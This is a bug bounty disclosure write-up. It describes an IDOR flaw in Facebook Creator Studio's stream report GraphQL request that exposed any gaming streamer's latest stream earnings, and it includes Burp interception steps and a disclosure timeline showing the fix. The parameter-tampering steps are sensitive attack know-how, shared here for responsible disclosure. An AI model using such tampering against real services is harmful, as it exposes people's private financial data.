Disclose latest stream video asset earnings for any gaming streamer page


Within the Facebook gaming dashboard, streamers have access to a valuable feature known as the “Viewing Stream Report.” This option provides essential information about their stream, including details such as the title, description, and tagged game. Streamers can leverage this tool to gain insights into the performance and key attributes of their streams. For additional details, refer to the official guide at https://www.facebook.com/business/help/423354648152123?id=648321075955172.

The finding

The Post request responsible for managing this option is susceptible to an Insecure Direct Object Reference (IDOR) bug within the “delegate_page_id” parameter. This vulnerability opens the door for potential exploitation, enabling unauthorized access to the financial information associated with any recent live stream on a gaming streamer’s page.

This flaw grants the attacker the capability to unveil the earnings associated with the latest stream video asset for any gaming streamer page. The severity of this vulnerability lies in the unauthorized disclosure of sensitive financial data, posing a significant risk to the affected gaming streamers’ privacy and financial security.

Reproduction Steps

Attacker’s Perspective:

  1. Navigate to https://business.facebook.com/creatorstudio/home ==> Creative tools ===> Live dashboard.
  2. Access the “Latest stream” box option and Intercept the request using Burp Suite. Click on “View Stream Report.”

Upon intercepting the POST request, observe the following details:

POST /api/graphql/ HTTP/1.1
Host: business.facebook.com


Identify the vulnerable parameter as “delegate_page_id.” Change its value to any streamer page and forward the request to the server.

This manipulation yields extensive information about the streamer page, including sensitive details:

  • "latest_stream_video_asset_earnings":"500.00"

This information, specifically the earnings, is considered private and should only be accessible to page administrators. Unauthorized access to such financial details poses a serious breach of privacy and requires immediate attention and remediation to uphold the integrity of the platform.


Sarmad | 22 Feb 2021

  • Initial Report

Meta Bug Bounty | 24 Feb 2021

  • Report Triaged

Meta Bug Bounty | 16 Mar 2021

  • Report Fixed

Sarmad | 16 Mar 2021

  • Fix Confirmed

Meta Bug Bounty | 19 Mar 2021

  • Bounty Awarded + Bonus